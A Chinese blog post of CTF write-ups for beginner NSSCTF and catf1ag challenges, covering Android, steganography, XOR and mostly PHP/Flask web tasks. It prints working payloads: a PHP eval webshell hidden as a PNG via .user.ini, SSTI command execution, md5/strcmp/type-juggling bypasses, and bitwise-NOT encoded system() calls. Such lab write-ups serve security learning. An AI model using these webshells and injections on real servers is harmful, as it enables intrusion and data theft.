CTF记录

1. [SWPUCTF 2022 新生赛]android

用jadx打开,然后搜索NSS关键字

NSSCTF{a_simple_Android}

2. [SWPU 2024 新生引导]ez_SSTI

模板注入题目,直接焚靖可以秒了

填入数据 ls /

然后 cat /flag即可

获取成功

NSSCTF{2111e7ad-97c5-40d5-9a3b-a2f657bd45e8}

3.[SWPUCTF 2024 秋季新生赛]The future

直接?file=/flag 即可

4.[SWPUCTF 2024 秋季新生赛]怎么多了个没用的php文件

根据题目名称:提示怎么多了个没用的php文件

同时根据题目描述:notion.php 是一个没啥用的php文件,不知道被设计出来是干什么的,出题人傻啦?

可以利用.user.ini文件

第一步:上传.user.ini

创建一个.user.ini文件,写入如下内容:

auto_prepend_file = 1.png

第二步:上传一句话木马(1.png)

创建一个1.txt文件,文件内容为如下内容,之后后缀改成png

<?php

@eval($_POST['x']);

phpinfo();

?>

第三步:使用蚁剑连接

使用蚁剑连接:http://node6.anna.nssctf.cn:28920/uploads/notion.php

NSSCTF{d2056ace-365d-4a90-8c86-3d98f8884b37}

5.[SWPUCTF 2024 秋季新生赛]PHP躲猫猫

get方式传参

post传参

进去到 /getfile.php 那里

经典的md5绕过与文件包含题目

get /getfile.php?CTF=s878926199a&&ATM=s1665632922a

post NSS=/f1ag

拿下

6.[NSSCTF 2022 Spring Recruit]办公文件里的秘密

下载附件为excel文档,进行填色

尝试修改文件后缀名,发现colors压缩包需要爆破

尝试爆破,爆破成功,密码为87654321

成功打开

NSSCTF{youknowtheoffice}

7. [SWPUCTF 2022 新生赛]Capture!

修改高度得part1

再LSB隐写一把梭

复制代码
zsteg -a flag.png #一把梭

猜测base64,无果

再颠倒顺序即可解出

8. [SWPUCTF 2023 秋季新生赛]咱们玩个游戏吧

下载附件,发现8个图片

新建个ppt然后导入即可,然后拼接

扫一下

发现是一串16进制的字符串,然后url解密即可

NSSCTF{mountains_and_seas_for_you}

9. [SWPUCTF 2022 新生赛]Cycle Again

打开,一张图片,一个压缩包

图片丢进随波逐流中

发现第一部分的flag NSSCTF{41d769db-

丢进b神的工具中

爆出第二段flag

9f5d-455e-a458-8012ba3660f3}

两段进行拼接

NSSCTF{41d769db-9f5d-455e-a458-8012ba3660f3}

10.easy_usr

分析

进入地址之后,是一段php代码

复制代码
<?php
//error_reporting(0);

show_source('./index.php');
class flag_in_there{
  public $name;
  public $age;

  public function __construct($name,$age){
    $this->name = $name;
    $this->age = $age;
  }
  public function get_flag(){
    echo "hello,i'm '$this->name',now '$this->age' years";
  }
}
$flag = new flag_in_there('vfree','19');
$ser = serialize($flag);
$un = $_GET['str'];

if($ser == $un){
  include('flag.php');
  echo $flag;
}else{
  echo "你真棒~";
}
?>

分析代码发现,只要让变量ser=un就可以显示flag。

un可以从手动输入,ser是一个实例序列化。因此可以运行下下面代码,打印一下ser的值就可以。

复制代码
class flag_in_there{
  public $name;
  public $age;

  public function __construct($name,$age){
    $this->name = $name;
    $this->age = $age;
  }
  public function get_flag(){
    echo "hello,i'm '$this->name',now '$this->age' years";
  }
}
$flag = new flag_in_there('vfree','19');
$ser = serialize($flag);
echo $ser

得到下面的结果

复制代码
O:13:"flag_in_there":2:{s:4:"name";s:5:"vfree";s:3:"age";s:2:"19";}

然后构造url:

http://subject.catf1ag.cn:49640/index.php?str=O:13:"flag_in_there":2:{s:4:"name";s:5:"vfree";s:3:"age";s:2:"19";}

显示flag:catf1ag{eauigjs4pmfc1d2wq3xkvl0h7b5rony89zt6}

11.json

进入网址显示:

复制代码
<?php
show_source('index.php');
include('flag.php');
$key = $_GET['key'];
$decode = json_decode($key);
if($decode->flag == $flag){
    echo $flag;
}else{
    echo "<h3>404 not found</h4>";
}

?>
404 not found

看代码,首先用到了json_decode函数,说明key应该是一个json类型字符串。

于是构造key={"flag":"0"},发现不行。

另外,需要构造的flag字段与变量flag相等。想到了php的弱类型比较。

php中弱类型对数据的类型要求并不严格,可以让数据类型互相转换。

== 和 ===的区别

php中其中两种比较符号:

==:先将字符串类型转化成相同,再比较

===:先判断两种字符串的类型是否相等,再比较

== 为松散比较 只比较值,不比较数据类型

若字符型值开头为数字,转为数字;

若开头不为数字,为 null 弱比较与 0 相等。)

复制代码
"abc123"==123 => false
"abc123"==0 => true
"123abc"==123 => true

于是构造key={"flag":0}

得到flag:catf1ag{95rzgmd8ji6uqaeycfs2wno4lt1kp7v3hbx0}

12.strcmp

复制代码
<?php
error_reporting(0);
include('flag.php');
show_source("index.php");
$str = $_GET['str'];
$init_str = "get_flag";
if($str!=$init_str){
    if(strcmp($init_str,$str)==0){
        echo $flag;
    }else{
        echo "no";
    }
}else{
    echo "nonono";
}

?> no

参数 str1第一个字符串。str2第二个字符串。如果 str1 小于 str2 返回 < 0; 如果 str1 大于 str2 返回 > 0;如果两者相等,返回 0。

可知,传入的期望类型是字符串类型的数据,但是如果我们传入非字符串类型的数据的时候,这个函数将会有怎么样的行为呢?实际上,当这个函数接受到了不符合的类型,这个函数将发生错误,但是在5.3之前的php中,显示了报错的警告信息后,将return 0 !!! 也就是虽然报了错,但却判定其相等了。这对于使用这个函数来做选择语句中的判断的代码来说简直是一个致命的漏洞,当然,php官方在后面的版本中修复了这个漏洞,使得报错的时候函数不返回任何值。但是我们仍然可以使用这个漏洞对使用老版本php的网站进行渗透测试

对于这段代码,我们能用什么办法绕过验证呢, 只要我们$_GET['str']是一个数组或者一个object即可,但是上一个问题的时候说到过,只能上传字符串类型,那我们又该如何做呢。

其实php为了可以上传一个数组,会把结尾带一对中括号的变量,例如 xxx[]的name(就是$_GET中的str),当作一个名字为xxx的数组构造

复制代码
?str[]=1

13.不等于0

md5()只对字符加密,对数组加密返回False

所以传输num[]=1既可

14.easy_flask 模板注入问题

打一个{{7*7}}

说明存在

{{config}}

成功解决

15.easy_flask2

尝试一波发现在 /flag下

复制代码
?cmd={{lipsum.__globals__.__builtins__.__import__("os").popen("ls").read()}}

?cmd={{lipsum.__globals__.__builtins__.__import__("os").popen("cat flag").read()}}

然后得出flag

16.又又不能相等

尝试一波数组绕过 ?num=[] 发现页面无回显内容

在响应头里查看

也可以用科学计数法进行绕过

?num=1e12

找flag方法同理

17.哦豁还有一办呢

查看响应头

发现响应头a

Y2F0ZjFhZ3tzMTBkdm1vOWsyY2hwa

查看源代码 发现flagb

两段进行拼接

Y2F0ZjFhZ3tzMTBkdm1vOWsyY2hwamw0d2d6bjZ5YmEzNzg1dHV4cmllcWZ9

catf1ag{s10dvmo9k2chpjl4wgzn6yba3785tuxrieqf}

18.xor

打开题目

1、推出异或的参数

一般结果都是'flag{'开头,用'flag{'和密文前5个字符异或,推出字符'GAMEG',推测是GAME循环异或

2、写脚本测试

s='!-,"<#}|!#}q#lt#w#`qpw.h~wyvjru#"x.p$s/v%<'

x='GAME'

result=''

for i in range(len(s)):

result += chr(ord(s[i]) ^ ord(x[i % 4]))

print(result)

得出flag

进行运行

flag{b09fb04d-9f0b-476c-9643-38fe9c5c2b3b}

19.bypass_wakeup

分析过程

运行出来

20.无字符webshell

看到过滤了大小写字母和数字

采用异或绕过或者取反绕过

进入显示:

复制代码
<?php
$cmd=$_GET['cmd'];
if(preg_match("/[A-Za-z0-9]/",$cmd)){

    die("giaogiaogiao!!!");
}
else {
    eval($cmd);
}
highlight_file(__FILE__)
?>

过滤了字母和数字,要求不能用字母和数字构造出php执行函数。

如何构造无字符webshell:https://blog.csdn.net/m0_59049258/article/details/132381714

函数名取反绕过正则。

使用php打印函数名取反的url编码

复制代码
<?php
    $a = "system";
    echo urlencode(~$a);
?>

输出:

复制代码
%8C%86%8C%8B%9A%92

用类似的方法,找出你想要执行的函数名url编码

复制代码
%8C%86%8C%8B%9A%92  // system 的取反url编码
%93%8C   // ls 的取反url编码
%99%96%91%9B%DF%D0%DF%D2%91%9E%92%9A%DF%DD%D5%99%93%9E%98%D5%DD // find / -name "*flag*" 的取反url编码
%9C%9E%8B%DF%D0%99%93%9E%98%D1%8B%87%8B  //  cat /flag.txt  的取反url编码

有了这些编码,就可以构造payload了。

例如,想要执行system(ls),可以构造:

复制代码
$_=~%8C%86%8C%8B%9A%92;$__=~%93%8C;$_($__);

接下来开始解题:

首先执行ls查看下文件

复制代码
http://subject.catf1ag.cn:45499/?cmd=$_=~%8C%86%8C%8B%9A%92;$__=~%93%8C;$_($__);

显示:

复制代码
Dockerfile docker-compose.yml index.php <?php
$cmd=$_GET['cmd'];
if(preg_match("/[A-Za-z0-9]/",$cmd)){

    die("giaogiaogiao!!!");
}
else {
    eval($cmd);
}
highlight_file(__FILE__)
?>

发现没有flag的信息,于是,尝试搜索下falg文件,尝试执行find / -name "*flag*"

复制代码
http://subject.catf1ag.cn:45499/?cmd=$_=~%8C%86%8C%8B%9A%92;$__=~%99%96%91%9B%DF%D0%DF%D2%91%9E%92%9A%DF%DD%D5%99%93%9E%98%D5%DD;$_($__);

显示:

复制代码
/sys/devices/pnp0/00:04/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS15/flags /sys/devices/platform/serial8250/tty/ttyS6/flags /sys/devices/platform/serial8250/tty/ttyS23/flags /sys/devices/platform/serial8250/tty/ttyS13/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /sys/devices/platform/serial8250/tty/ttyS4/flags /sys/devices/platform/serial8250/tty/ttyS21/flags /sys/devices/platform/serial8250/tty/ttyS11/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS28/flags /sys/devices/platform/serial8250/tty/ttyS18/flags /sys/devices/platform/serial8250/tty/ttyS9/flags /sys/devices/platform/serial8250/tty/ttyS26/flags /sys/devices/platform/serial8250/tty/ttyS16/flags /sys/devices/platform/serial8250/tty/ttyS7/flags /sys/devices/platform/serial8250/tty/ttyS24/flags /sys/devices/platform/serial8250/tty/ttyS14/flags /sys/devices/platform/serial8250/tty/ttyS5/flags /sys/devices/platform/serial8250/tty/ttyS22/flags /sys/devices/platform/serial8250/tty/ttyS12/flags /sys/devices/platform/serial8250/tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /sys/devices/platform/serial8250/tty/ttyS20/flags /sys/devices/platform/serial8250/tty/ttyS10/flags /sys/devices/platform/serial8250/tty/ttyS29/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/platform/serial8250/tty/ttyS19/flags /sys/devices/platform/serial8250/tty/ttyS27/flags /sys/devices/platform/serial8250/tty/ttyS17/flags /sys/devices/platform/serial8250/tty/ttyS8/flags /sys/devices/platform/serial8250/tty/ttyS25/flags /sys/devices/virtual/net/lo/flags /sys/devices/virtual/net/eth0/flags /sys/module/scsi_mod/parameters/default_dev_flags /proc/sys/kernel/acpi_video_flags /proc/sys/kernel/sched_domain/cpu0/domain0/flags /proc/sys/kernel/sched_domain/cpu1/domain0/flags /proc/kpageflags /flag.txt <?php
$cmd=$_GET['cmd'];
if(preg_match("/[A-Za-z0-9]/",$cmd)){

    die("giaogiaogiao!!!");
}
else {
    eval($cmd);
}
highlight_file(__FILE__)
?>

找到了flag文件,查看内容,执行cat /flag.txt

得到flag:

复制代码
catf1ag{327a6c4304ad5938eaf0efb6cc3e53dc} <?php
$cmd=$_GET['cmd'];
if(preg_match("/[A-Za-z0-9]/",$cmd)){

    die("giaogiaogiao!!!");
}
else {
    eval($cmd);
}
highlight_file(__FILE__)
?>

catf1ag{327a6c4304ad5938eaf0efb6cc3e53dc}

21.舔狗日记

打开

随便点击一下

然后在后面添加经过base64编码的东西

相关推荐
DourPanda31 分钟前
polarctf-web-[rce1]
linux·网络协议·网络安全
小oo呆44 分钟前
【学习心得】Jupyter 如何在conda的base环境中其他虚拟环境内核
python·jupyter·conda
小白学大数据2 小时前
Scrapy框架下地图爬虫的进度监控与优化策略
开发语言·爬虫·python·scrapy·数据分析
浊酒南街2 小时前
TensorFlow之微分求导
人工智能·python·tensorflow
立秋67892 小时前
用Python绘制梦幻星空
开发语言·python·pygame
alpszero2 小时前
YOLO11解决方案之对象裁剪探索
人工智能·python·计算机视觉·yolo11
白云千载尽2 小时前
相机、雷达标定工具,以及雷达自动标定的思路
python·自动驾驶·ros
咕噜咕噜啦啦3 小时前
python爬虫实战训练
爬虫·python
盛夏绽放3 小时前
Python字符串常用内置函数详解
服务器·开发语言·python
我想睡觉2613 小时前
Python训练营打卡DAY27
开发语言·python·机器学习